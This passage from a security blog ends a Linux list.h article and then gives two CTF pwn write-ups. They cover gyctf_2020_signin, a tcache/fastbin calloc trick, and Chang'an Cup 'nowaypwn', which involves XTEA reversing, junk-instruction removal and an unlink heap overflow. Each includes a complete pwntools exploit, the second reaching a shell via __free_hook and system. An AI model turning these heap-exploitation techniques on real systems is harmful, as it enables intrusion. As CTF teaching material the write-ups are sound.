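    offset = getattr(struct_type, member_name).offset   # plays the role of offsetof()
    return struct_type.from_address(member_addr - offset)


page = Page(index=42)
member_addr = ctypes.addressof(page.wb_list)   # pretend only this address is known
recovered = container_of(member_addr, Page, "wb_list")
print(recovered.index)
```

`recovered` is a second view of the same memory as `page`, so reading `recovered.index` returns the value stored through `page`.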

Finally, let us look at

/**
 * list_for_each	-	iterate over a list
 * @pos:	the &struct list_head to use as a loop cursor.
 * @head:	the head for your list.
 */
#define list_for_each(pos, head) \
	for (pos = (head)->next; prefetch(pos->next), pos != (head); \
        	pos = pos->next)

#ifndef ARCH_HAS_PREFETCH
#define prefetch(x) __builtin_prefetch(x)
#endif

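There is not much to say about the traversal itself; the only thing worth mentioning is prefetch. prefetch is __builtin_prefetch, and the name makes it clear that this is a GCC built-in function. A quick lookup shows that it prefetches data to reduce latency, roughly to avoid a cache miss when the data is used later.

That is the end of this article. Y7n05h thinks the rest of list.h contains nothing that is hard to understand.

References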

¹. LinuxKernel. ↩

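Published 2021-11-13 · CyberspaceSecurity · 10 min read (about 1457 characters)

gyctf_2020_signin

License
This article quotes some source code from the GNU C Library, which is licensed under LGPLv2.1.

Note: the challenge runs with glibc 2.27-3ubuntu1_amd64, but all glibc code shown in this article is from 2.34.

To everyone reading this article, please allow Y7n05h to dig up this all too familiar piece of code once more. Notice that taking a chunk out of a non-empty tcache happens in __libc_malloc(), not in _int_malloc().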

void *
__libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;

  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
                  "PTRDIFF_MAX is not more than half of SIZE_MAX");

  if (!__malloc_initialized)
    ptmalloc_init ();
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  if (!checked_request2size (bytes, &tbytes))
    {
      __set_errno (ENOMEM);
      return NULL;
    }
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      && tcache
      && tcache->counts[tc_idx] > 0)
    {
      victim = tcache_get (tc_idx);
      return tag_new_usable (victim);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif

  if (SINGLE_THREAD_P)
    {
      victim = tag_new_usable (_int_malloc (&main_arena, bytes));
      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
	      &main_arena == arena_for_chunk (mem2chunk (victim)));
      return victim;
    }

  arena_get (ar_ptr, bytes);

  victim = _int_malloc (ar_ptr, bytes);
  /* Retry with another arena only if we were able to find a usable arena
     before.  */
  if (!victim && ar_ptr != NULL)
    {
      LIBC_PROBE (memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  victim = tag_new_usable (victim);

  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
          ar_ptr == arena_for_chunk (mem2chunk (victim)));
  return victim;
}

Now look at __libc_calloc():

void *
__libc_calloc (size_t n, size_t elem_size)
{
  mstate av;
  mchunkptr oldtop;
  INTERNAL_SIZE_T sz, oldtopsize;
  void *mem;
  unsigned long clearsize;
  unsigned long nclears;
  INTERNAL_SIZE_T *d;
  ptrdiff_t bytes;

  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
    {
       __set_errno (ENOMEM);
       return NULL;
    }

  sz = bytes;

  if (!__malloc_initialized)
    ptmalloc_init ();

  MAYBE_INIT_TCACHE ();

  if (SINGLE_THREAD_P)
    av = &main_arena;
  else
    arena_get (av, sz);

  if (av)
    {
      /* Check if we hand out the top chunk, in which case there may be no
	 need to clear. */
#if MORECORE_CLEARS
      oldtop = top (av);
      oldtopsize = chunksize (top (av));
# if MORECORE_CLEARS < 2
      /* Only newly allocated memory is guaranteed to be cleared.  */
      if (av == &main_arena &&
	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
# endif
      if (av != &main_arena)
	{
	  heap_info *heap = heap_for_ptr (oldtop);
	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
	}
#endif
    }
  else
    {
      /* No usable arenas.  */
      oldtop = 0;
      oldtopsize = 0;
    }
  mem = _int_malloc (av, sz);

  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
          av == arena_for_chunk (mem2chunk (mem)));

  if (!SINGLE_THREAD_P)
    {
      if (mem == 0 && av != NULL)
	{
	  LIBC_PROBE (memory_calloc_retry, 1, sz);
	  av = arena_get_retry (av, sz);
	  mem = _int_malloc (av, sz);
	}

      if (av != NULL)
	__libc_lock_unlock (av->mutex);
    }

  /* Allocation failed even after a retry.  */
  if (mem == 0)
    return 0;

  mchunkptr p = mem2chunk (mem);

  /* If we are using memory tagging, then we need to set the tags
     regardless of MORECORE_CLEARS, so we zero the whole block while
     doing so.  */
  if (__glibc_unlikely (mtag_enabled))
    return tag_new_zero_region (mem, memsize (p));

  INTERNAL_SIZE_T csz = chunksize (p);

  /* Two optional cases in which clearing not necessary */
  if (chunk_is_mmapped (p))
    {
      if (__builtin_expect (perturb_byte, 0))
        return memset (mem, 0, sz);

      return mem;
    }

#if MORECORE_CLEARS
  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
    {
      /* clear only the bytes from non-freshly-sbrked memory */
      csz = oldtopsize;
    }
#endif

  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
     contents have an odd number of INTERNAL_SIZE_T-sized words;
     minimally 3.  */
  d = (INTERNAL_SIZE_T *) mem;
  clearsize = csz - SIZE_SZ;
  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
  assert (nclears >= 3);

  if (nclears > 9)
    return memset (d, 0, clearsize);

  else
    {
      *(d + 0) = 0;
      *(d + 1) = 0;
      *(d + 2) = 0;
      if (nclears > 4)
        {
          *(d + 3) = 0;
          *(d + 4) = 0;
          if (nclears > 6)
            {
              *(d + 5) = 0;
              *(d + 6) = 0;
              if (nclears > 8)
                {
                  *(d + 7) = 0;
                  *(d + 8) = 0;
                }
            }
        }
    }

  return mem;
}

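Everyone can see that __libc_calloc() and __libc_malloc() differ very little, and in general it is reasonable to think of __libc_calloc() as __libc_malloc() + memset(). But there is one more difference: __libc_calloc() lacks the part that takes a chunk out of a non-empty tcache, so calloc() will allocate from the fastbin first.

This is the core idea behind the exploit for this challenge.

Wrong approach: `tcache poisoning`

At first Y7n05h also wanted to solve the challenge with tcache poisoning, hoping that the free/malloc sequence would clear cnt and allow a second edit. Unfortunately, this is a dead end. With this approach a chunk can be allocated on top of ptr, but the value of ptr cannot be modified. (At least Y7n05h could not think of a way.)

Correct approach

This approach was learned from Pwnki's blog. Many thanks to Pwnki.

The idea of the exploit:

1. Allocate 8 chunks of size 0x80 and free all of them. The first 7 fill up the tcache and the last one goes into the fastbin.
2. Allocate one more chunk, which takes one chunk out of the tcache.
3. Overwrite the fd pointer of the chunk that was placed in the fastbin in step 1 with ptr - 0x10. Note that this makes glibc treat ptr - 0x10 as a chunk, so ptr becomes the fd of that chunk.
4. Trigger backdoor, which calls calloc. calloc takes the chunk out of the fastbin and inserts the chunk at ptr - 0x10, which its fd points to, into the tcache list. During this insertion ptr is modified, because it serves as the next field of the tcache_entry.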
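The four steps can be replayed on a deliberately simplified model of a single size class. This is only a sketch under strong assumptions: `ToyHeap` is invented for this example, chunks are plain strings, the fastbin's fd chain is modelled as a Python list whose last element is the head, and none of glibc's integrity checks are modelled.

```python
TCACHE_MAX = 7   # default number of chunks the tcache keeps per size class


class ToyHeap:
    """Rough model of one size class: a tcache stack plus a fastbin stack."""

    def __init__(self):
        self.tcache, self.fastbin = [], []

    def free(self, chunk):
        # free() prefers the tcache and falls back to the fastbin once it is full.
        target = self.tcache if len(self.tcache) < TCACHE_MAX else self.fastbin
        target.append(chunk)

    def malloc(self):
        # malloc() serves from a non-empty tcache before anything else.
        return self.tcache.pop() if self.tcache else self._int_malloc()

    def calloc(self):
        # calloc() has no tcache lookup and goes straight to _int_malloc().
        return self._int_malloc()

    def _int_malloc(self):
        if not self.fastbin:
            return "fresh chunk"
        victim = self.fastbin.pop()
        # Remaining fastbin chunks are stashed into the tcache while it has room.
        while self.fastbin and len(self.tcache) < TCACHE_MAX:
            self.tcache.append(self.fastbin.pop())
        return victim


heap = ToyHeap()
for i in range(8):
    heap.free(f"chunk{i}")               # step 1: chunk0..6 -> tcache, chunk7 -> fastbin
heap.malloc()                            # step 2: frees up one tcache slot
heap.fastbin.insert(0, "ptr-0x10")       # step 3: chunk7's fd now names a fake chunk
victim = heap.calloc()                   # step 4: the calloc made by backdoor
print(victim, heap.tcache[-1])
```

In the model, calloc returns chunk7 and the fake chunk ends up at the head of the tcache. In the real allocator that insertion writes the previous tcache head into the fake chunk's next field, which is located at ptr, and that is how ptr gets modified.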

The code relevant to these steps:

typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  uintptr_t key;
} tcache_entry;

#define REMOVE_FB(fb, victim, pp)			\
  do							\
    {							\
      victim = pp;					\
      if (victim == NULL)				\
	break;						\
      pp = REVEAL_PTR (victim->fd);                                     \
      if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp)))       \
	malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
    }							\
  while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
	 != victim);					\

     /* While we're here, if we see other chunks of the same size,
 stash them in the tcache.  */
     size_t tc_idx = csize2tidx (nb);
     if (tcache && tc_idx < mp_.tcache_bins)
{
  mchunkptr tc_victim;

  /* While bin not empty and tcache not full, copy chunks.  */
  while (tcache->counts[tc_idx] < mp_.tcache_count
	 && (tc_victim = *fb) != NULL)
    {
      if (__glibc_unlikely (misaligned_chunk (tc_victim)))
	malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
      if (SINGLE_THREAD_P)
	*fb = REVEAL_PTR (tc_victim->fd);
      else
	{
	  REMOVE_FB (fb, pp, tc_victim);
	  if (__glibc_unlikely (tc_victim == NULL))
	    break;
	}
      tcache_put (tc_victim, tc_idx);
    }
}

The complete exp:

from pwn import *
path = '/home/admin/Downloads/gyctf_2020_signin'
elf = ELF(path)
r = process(path)


def i2b(n: int, Hex: bool = False):
    return bytes(hex(n) if Hex else str(n), encoding="ascii")


def backdoor():
    r.sendafter(b"?", b'6')


def add(idx: int):
    r.sendafter(b"?", b'1')
    r.sendafter(b"idx?\n", i2b(idx))


def delete(idx: int):
    r.sendafter(b"?", b'3')
    r.sendafter(b"idx?\n", i2b(idx))


def edit(idx: int, content: bytes):
    r.sendafter(b"?", b'2')
    r.sendafter(b"idx?\n", i2b(idx))
    r.send(content)


addr = elf.symbols['ptr']-0x10
for i in range(8):
    add(i)
for i in range(8):
    delete(i)

add(8)
payload = p64(addr)
edit(7, payload)

backdoor()
r.interactive()

References

¹. Pwnki-gyctf_2020_signin. ↩

². PYozo_free-gyctf_2020_signin. ↩

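Published 2021-10-20 · CyberspaceSecurity · 20 min read (about 2941 characters)

WriteUp: Chang'an Cup (长安杯) 2021 Finals AWD, nowaypwn

Y7n05h was thrilled to have the chance (albeit as a substitute) to take part in the Chang'an Cup 2021 finals. This was Y7n05h's first on-site CTF, and for lack of experience Y7n05h made quite a few mistakes. In this article, Y7n05h reviews what happened during the competition.
Thanks also go to the senior player of team 「摸一把」 for the guidance given to Y7n05h.
In the AWD format, Y7n05h deeply regrets not having solved this nowaypwn challenge.

Now let Y7n05h take a fresh look at the challenge and see what it was really testing.

Disclaimer

All PWN described in this article took place as part of CTF (Capture The Flag) competitions or training for them. Every target the author attacked was a machine provided by the platform for a CTF competition or practice.
This article is meant to share techniques and tips related to network security and CTF so that everyone can improve together.
Readers should keep the relevant laws, regulations and policies in mind. Readers bear the legal consequences of their own actions. The author (Y7n05h) takes no responsibility for readers' actions.

Basic Analysis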

pwn/nowaypwn
filetype: ELF64
arch: AMD64
mode: 64 bits
endianess: LE
type: EXEC
  library: GLIBC(2.4)[EXEC AMD64-64]
  compiler: gcc((Ubuntu 5.3.1-14ubuntu2) 5.3.1 20160413)[EXEC AMD64-64]
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols	 No	0		2	/home/admin/pwn/nowaypwn
	linux-vdso.so.1 (0x00007ffc85dee000)
	libc.so.6 => /usr/lib/libc.so.6 (0x00007fd505212000)
	/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fd5053fd000)

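The libc attachment provided with the challenge is version 2.23-0ubuntu11.3_amd64, with SHA-1 eb4e85135a8dfe60c1f5bfb704b1e5cfde24a0b8 (probably this one; the files got mixed up and Y7n05h is not entirely sure).

Reverse Engineering Analysis

Although this is a PWN challenge, in Y7n05h's view its most important part is not the PWN but the reverse engineering. The PWN part is very simple, while the author of the challenge placed several obstacles in the reverse engineering part. Y7n05h explains them one by one below.

Below is the pseudocode generated by IDA.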

__int64 __fastcall sub_400BFD(unsigned int *a1)
{
  __int64 result; // rax
  int i; // [rsp+1Ch] [rbp-3Ch]
  unsigned int v3; // [rsp+20h] [rbp-38h]
  unsigned int v4; // [rsp+24h] [rbp-34h]
  unsigned int v5; // [rsp+28h] [rbp-30h]
  int v6[6]; // [rsp+38h] [rbp-20h]
  unsigned __int64 v7; // [rsp+50h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  v6[0] = 674697780;
  v6[1] = 422065475;
  v6[2] = 423118625;
  v6[3] = -1741216238;
  v3 = *a1;
  v4 = a1[1];
  v5 = 0;
  for ( i = 0; i <= 31; ++i )
  {
    v3 += (((v4 >> 5) ^ (16 * v4)) + v4) ^ (v6[v5 & 3] + v5);
    v5 -= 1640531527;
    v4 += (((v3 >> 5) ^ (16 * v3)) + v3) ^ (v6[(v5 >> 11) & 3] + v5);
  }
  *a1 = v3;
  result = v4;
  a1[1] = v4;
  return result;
}
_BOOL8 __fastcall sub_400DB8(_BYTE *a1)
{
  sub_400BFD(a1);
  return *a1 == 20
      && a1[1] == 92
      && a1[2] == 0xA6
      && a1[3] == 0xD2
      && a1[4] == 14
      && a1[5] == 69
      && a1[6] == 9
      && a1[7] == 119;
}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 result; // rax
  char v4[16]; // [rsp+18h] [rbp-50h] BYREF
  char buf[16]; // [rsp+28h] [rbp-40h] BYREF
  char v6[40]; // [rsp+38h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+60h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  sub_40091D(a1, a2, a3);
  puts("Happy to see you darling!");
  puts("Give me your name:");
  read(0, buf, 0x10uLL);
  puts("Give me your key:");
  read(0, v4, 0x20uLL);
  puts("Now start the game!");
  do
  {
    puts("Input your password!:");
    read(0, v6, 0x2CuLL);
    result = sub_400DB8(v6);
  }
  while ( (_DWORD)result != 1 );
  return result;
}

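Y7n05h found no vulnerability in the pseudocode.

Could this be a stack challenge, with the vulnerability hidden inside sub_400BFD()?

The IDA plugin Findcrypt reports TEA_DELTA_400C64. A web search then leads to the TEA encryption algorithm.

#include <stdint.h>
uint32_t delta = 0x9e3779b9; // constant, can be changed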

void tea_encrypt(uint32_t s[2], const uint32_t key[4]) {


    uint32_t l = s[0];
    uint32_t r = s[1];
    uint32_t sum = 0;
    for (int i = 0; i < 32; ++i) {
        l += (((r >> 5) ^ (r << 4)) + r) ^ (key[sum & 3] + sum);
        sum += delta;
        r += (((l >> 5) ^ (l << 4)) + l) ^ (key[(sum >> 11) & 3] + sum);
    }
    s[0] = l;
    s[1] = r;
}
void tea_decrypt(uint32_t v[2], const uint32_t key[4]) {
    uint32_t l = v[0], r = v[1];

    uint32_t sum = delta << 5;
    for (int i = 0; i < 32; i++) {
        r -= (((l << 4) ^ (l >> 5)) + l) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        l -= (((r << 4) ^ (r >> 5)) + r) ^ (sum + key[sum & 3]);
    }
    v[0] = l;
    v[1] = r;
}

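By comparing tea_encrypt() with sub_400BFD(), Y7n05h concluded that sub_400BFD() is a function that encrypts one 64-bit block with the TEA algorithm.

Some readers may object:

In tea_encrypt() it is:

sum += delta;

In sub_400BFD() it is:

v5 -= 1640531527;

The two not only use different values, one is an addition and the other a subtraction. How can sub_400BFD() and tea_encrypt() be called equivalent?

Readers with this concern should remember that signed integers are stored in two's complement, so in 32-bit arithmetic subtracting 1640531527 is the same as adding 0x9e3779b9.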
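The equivalence is easy to confirm numerically. The snippet below is a small check, with `MASK32`, `sub32` and `add32` introduced only for this example to mimic 32-bit wrap-around in Python, whose integers are otherwise unbounded.

```python
MASK32 = 0xFFFFFFFF          # uint32_t arithmetic wraps modulo 2**32

ida_constant = 1640531527    # what the decompiler shows in `v5 -= 1640531527`
tea_delta = 0x9E3779B9       # what the reference code adds


def sub32(a: int, b: int) -> int:
    """32-bit subtraction with wrap-around."""
    return (a - b) & MASK32


def add32(a: int, b: int) -> int:
    """32-bit addition with wrap-around."""
    return (a + b) & MASK32


# Subtracting one constant and adding the other agree for every tested state.
same = all(sub32(s, ida_constant) == add32(s, tea_delta)
           for s in (0, 1, 0x12345678, MASK32))
print(same, hex((-ida_constant) & MASK32))
```

The two constants add up to exactly $2^{32}$, which is why the decompiler is free to print either form.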

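Y7n05h therefore considered the two functions fully equivalent (at this point that conclusion is correct). In other words, sub_400BFD() is an implementation of the TEA encryption algorithm, so whatever sub_400BFD() encrypts can be decrypted with tea_decrypt().

Do not rush to decrypt the ciphertext yet. Remember that this is a PWN challenge, not a reversing challenge, so where is the vulnerability? Y7n05h did not find it.

During the tense AWD competition, Y7n05h made no further progress on this challenge. After realising that the challenge could not be solved, Y7n05h decided to start on defence first and wrote the following code: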

#include <stdio.h>
#include <unistd.h>
int main(void) {
    setvbuf(stderr, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    char buf[0x50];
    puts("Happy to see you darling!");
    puts("Give me your name:");
    read(0, buf, 0x10uLL);
    puts("Give me your key:");
    read(0, buf, 0x20uLL);
    puts("Now start the game!");
    do {
        puts("Input your password!:");
        read(0, buf, 0x2CuLL);
    } while (1);
}

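To stop other teams from pwning Y7n05h's machine, Y7n05h compiled the code above and replaced the program on the target machine with it. The competition platform did not mark the machine as down, so Y7n05h knew that this change had passed the check. (After the competition, the senior player of team 「摸一把」 told Y7n05h that the organisers' check was too lenient: in most competitions the check compares the size of the original program with the program running on the target machine, and too large a difference fails the check.) That this change passed the checks was pure luck; readers should not imitate it.

Next, use the key (the first 128 bits of v6, that is, the key below):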

uint32_t key[4] =
        {0x28371234,
         0x19283543,
         0x19384721,
         0x98372612};

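to decrypt the ciphertext block:

uint8_t message[9] = {0x14, 0x5c, 0xa6, 0xd2, 0x0e, 0x45, 0x09, 0x77};

Sending the resulting plaintext block to the program through pwntools produced a wrong-password message.

Y7n05h tried extracting the pseudocode of sub_400BFD(), modifying and compiling it, and feeding it the plaintext block and key obtained above. It produced the expected ciphertext block.
Y7n05h then traced the encryption performed by sub_400BFD() with gdb, and found that when sub_400BFD() finished, the ciphertext block differed from the expected one.

This was truly baffling! The plaintext obtained by decrypting the ciphertext with tea_decrypt() yields the same ciphertext block when fed to tea_encrypt() or to the sub_400BFD() copied out of IDA, but when fed to the nowaypwn program it yields a ciphertext block different from the output of tea_encrypt().

How strange! Y7n05h began to wonder whether sub_400BFD() contained C Undefined Behavior that led to different execution results.

Just as Y7n05h was about to compare the assembly obtained by compiling the sub_400BFD() pseudocode with the disassembly of nowaypwn, the following turned up: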

.text:0000000000400CF2                 call    $+5
.text:0000000000400CF7                 add     [rsp+58h+var_58], 6
.text:0000000000400CFC                 retn
.text:0000000000400CFC sub_400BFD      endp ; sp-analysis failed

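IDA reports an error because of junk instructions here. Everything Y7n05h pasted above consists of junk instructions meant to confuse disassemblers and decompilers. Readers who want to know why these instructions confuse such tools can trace the execution of these three instructions in GDB.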
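For readers who prefer arithmetic to single-stepping, the effect of the three instructions can be worked out by hand. The sketch below assumes the usual x86-64 encodings: a near `call` with a 32-bit displacement is 5 bytes long, `retn` is 1 byte, and `[rsp+58h+var_58]` denotes the top of the stack. The variable names are made up for this example.

```python
CALL_ADDR = 0x400CF2   # address of `call $+5`, taken from the listing
CALL_LEN = 5           # assumed length of a near call with a 32-bit displacement
RETN_ADDR = 0x400CFC   # address of `retn`, taken from the listing

pushed_return = CALL_ADDR + CALL_LEN   # `call` pushes the address of the next instruction
patched_return = pushed_return + 6     # `add [rsp], 6` rewrites that saved address
landing = patched_return               # `retn` pops it and jumps there

print(hex(pushed_return), hex(landing))
```

The computed landing address is the byte immediately after `retn`, so execution simply continues, while a tool that trusts `retn` as the end of the function stops analysing there.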

Using IDA's patch feature to replace these junk instructions with nop and then letting IDA reanalyse the program yields the complete pseudocode of sub_400BFD():

unsigned __int64 __fastcall sub_400BFD(unsigned int *a1)
{
  int i; // [rsp+14h] [rbp-3Ch]
  int j; // [rsp+14h] [rbp-3Ch]
  unsigned int v4; // [rsp+18h] [rbp-38h]
  unsigned int v5; // [rsp+18h] [rbp-38h]
  unsigned int v6; // [rsp+1Ch] [rbp-34h]
  unsigned int v7; // [rsp+1Ch] [rbp-34h]
  unsigned int v8; // [rsp+20h] [rbp-30h]
  unsigned int v9; // [rsp+20h] [rbp-30h]
  unsigned int v10; // [rsp+24h] [rbp-2Ch]
  unsigned int v11; // [rsp+28h] [rbp-28h]
  int v12[6]; // [rsp+30h] [rbp-20h]
  unsigned __int64 v13; // [rsp+48h] [rbp-8h]

  v13 = __readfsqword(0x28u);
  v10 = *a1;
  v11 = a1[1];
  v12[0] = 674697780;
  v12[1] = 422065475;
  v12[2] = 423118625;
  v12[3] = -1741216238;
  v4 = *a1;
  v6 = a1[1];
  v8 = 0;
  for ( i = 0; i <= 31; ++i )
  {
    v4 += (((v6 >> 5) ^ (16 * v6)) + v6) ^ (v12[v8 & 3] + v8);
    v8 -= 1640531527;
    v6 += (((v4 >> 5) ^ (16 * v4)) + v4) ^ (v12[(v8 >> 11) & 3] + v8);
  }
  *a1 = v4;
  a1[1] = v6;
  v5 = v10;
  v7 = v11;
  v9 = 0;
  for ( j = 0; j <= 8; ++j )
  {
    v5 += (((v7 >> 5) ^ (16 * v7)) + v7) ^ (v12[v9 & 3] + v9);
    v9 += 0x19286521;
    v7 += (((v5 >> 5) ^ (16 * v5)) + v5) ^ (v12[(v9 >> 11) & 3] + v9);
  }
  *a1 = v5;
  a1[1] = v7;
  return __readfsqword(0x28u) ^ v13;
}

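Analysing this pseudocode shows that the ciphertext block produced by the TEA algorithm is never used; what the program really uses is a different encryption algorithm. In the end it turns out to be the XTEA algorithm.
This is an XTEA implementation that Y7n05h found by searching.

#include <stdint.h>
#define delta 0x9E3779B9U // constant, can be changed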
void encrypt(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    for (int i = 0; i < num_rounds; i++) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += delta;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}

void decrypt(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    uint32_t v0 = v[0], v1 = v[1], sum = delta * num_rounds;
    for (int i = 0; i < num_rounds; i++) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}

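The comparison confirms that the algorithm used here is XTEA with a modified delta constant.

In fact, junk instructions appear not only here (0x400CF2) but also at 0x400EEE and 0x400B44. After patching them out and regenerating the pseudocode with IDA, the vulnerability is plain to see: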

ssize_t Edit()
{
  ssize_t result; // rax
  unsigned __int64 Idx; // [rsp+8h] [rbp-8h]

  Idx = get_Idx();
  if ( Idx > 0x10 || !Arr[2 * Idx] || !Size[2 * Idx] )
    exit(0);
  read(0, Arr[2 * Idx], Size[2 * Idx]);
  result = Size[2 * Idx];
  if ( result == 0x66 )
    return read(0, Arr[2 * Idx], 0x80uLL);
  return result;
}

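The overflow here is overly deliberate. Once the junk instructions are patched out, anyone should be able to spot this vulnerability with ease.

Exploitation

With the complete pseudocode in hand, we know that the challenge uses XTEA with a modified constant. After changing the constant in the XTEA decryption routine, decryption yields: skdmaje1.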
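A decryptor for this variant might look roughly like the sketch below. It assumes the parameters read off the second loop of the patched pseudocode (constant 0x19286521, 9 rounds, the four key words, little-endian 32-bit halves); `_mix`, `encrypt` and `decrypt` are names chosen for this example, and the code is not taken from the original solution.

```python
import struct

MASK32 = 0xFFFFFFFF
DELTA = 0x19286521   # constant used by the second loop of sub_400BFD()
ROUNDS = 9           # that loop runs for j = 0..8
KEY = (0x28371234, 0x19283543, 0x19384721, 0x98372612)


def _mix(v: int, s: int, k: int) -> int:
    """One XTEA mixing term, reduced to 32 bits."""
    return ((((v << 4) ^ (v >> 5)) + v) ^ (s + k)) & MASK32


def encrypt(block: bytes) -> bytes:
    v0, v1 = struct.unpack("<2I", block)
    s = 0
    for _ in range(ROUNDS):
        v0 = (v0 + _mix(v1, s, KEY[s & 3])) & MASK32
        s = (s + DELTA) & MASK32
        v1 = (v1 + _mix(v0, s, KEY[(s >> 11) & 3])) & MASK32
    return struct.pack("<2I", v0, v1)


def decrypt(block: bytes) -> bytes:
    v0, v1 = struct.unpack("<2I", block)
    s = (DELTA * ROUNDS) & MASK32
    for _ in range(ROUNDS):
        v1 = (v1 - _mix(v0, s, KEY[(s >> 11) & 3])) & MASK32
        s = (s - DELTA) & MASK32
        v0 = (v0 - _mix(v1, s, KEY[s & 3])) & MASK32
    return struct.pack("<2I", v0, v1)


# The eight bytes that sub_400DB8() compares against.
target = bytes([0x14, 0x5C, 0xA6, 0xD2, 0x0E, 0x45, 0x09, 0x77])
candidate = decrypt(target)   # the write-up reports skdmaje1; not re-verified here
print(candidate)
```

Decryption runs the rounds in reverse, starting from `DELTA * ROUNDS`, so any 8-byte block survives an `encrypt` followed by `decrypt` unchanged.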

Based on the pseudocode, write:

from pwn import *
context(log_level='debug', os='linux', arch='amd64')

path = '/home/admin/pwn/nowaypwn'
libcpath = '/home/admin/pwn/libc.so.6'

libc = ELF(libcpath)
elf = ELF(path)
r = process(path)

passwd = b'skdmaje1'

r.sendafter(":\n", b'123')  # name
r.sendafter(":\n", b'123')  # key
r.sendafter(":\n", passwd)  # passwd


def up6(addr_port: bytes):
    log.debug("get bytes"+addr_port.hex())
    recvlen = len(addr_port)
    log.debug("recv len "+hex(recvlen))
    assert(recvlen == 6)

    return u64(addr_port.ljust(8, b"\x00"))


def i2b(n: int, Hex: bool = False):
    return bytes(hex(n) if Hex else str(n), encoding="ascii")


def Alloc(size: int):
    r.sendline(b'1')
    r.sendline(i2b(size))


def Delete(idx: int):
    r.sendline(b'2')
    r.sendline(i2b(idx))


def Edit(idx: int, content: bytes):
    r.sendline(b'3')
    r.sendline(i2b(idx))
    r.send(content)


def Show(idx: int):
    r.sendline(b'4')
    r.sendline(i2b(idx))


def Get_pr(idx: int):
    return 0x6020C0+idx*0x10

Since PIE is not enabled for this challenge, Y7n05h chose to solve it with Unlink.

Alloc(0x30)  # 0
Alloc(0x30)  # 1
Alloc(0x66)  # 2
Alloc(0x100)  # 3
Alloc(0x10)  # 4

Edit(0, b'/bin/sh\x00')

Edit(2, cyclic(0x66))
chunk2_pr = Get_pr(2)
payload = flat(0, 0x21, chunk2_pr-0x18, chunk2_pr -
               0x10, 0x20).ljust(0x60)+flat(0x60, 0x110)
r.send(payload)  # size 0x66 triggers the second read, which causes the overflow

# Unlink
Delete(3)

payload = flat(8, elf.got['puts'], 0x8, Get_pr(1), 8)
Edit(2, payload)
r.send(p64(elf.got['puts']))  # size 0x66 triggers the second read

Show(1)
puts_addr = up6(r.recv(6))
libc_base = puts_addr-libc.symbols['puts']
free_hook_addr = libc.symbols['__free_hook']+libc_base
system_addr = libc.symbols['system']+libc_base
payload = p64(free_hook_addr)
Edit(2, payload)
Edit(1, p64(system_addr))
Delete(0)
r.interactive()

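Because the PWN part of this challenge is very simple, Y7n05h will not explain what each line of the exp does.

Finally, thanks once again to the senior player of team 「摸一把」. Y7n05h did not find the vulnerability during the competition; that junk instructions were hiding it is something Y7n05h only learned from the senior player of team 「摸一把」 afterwards.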
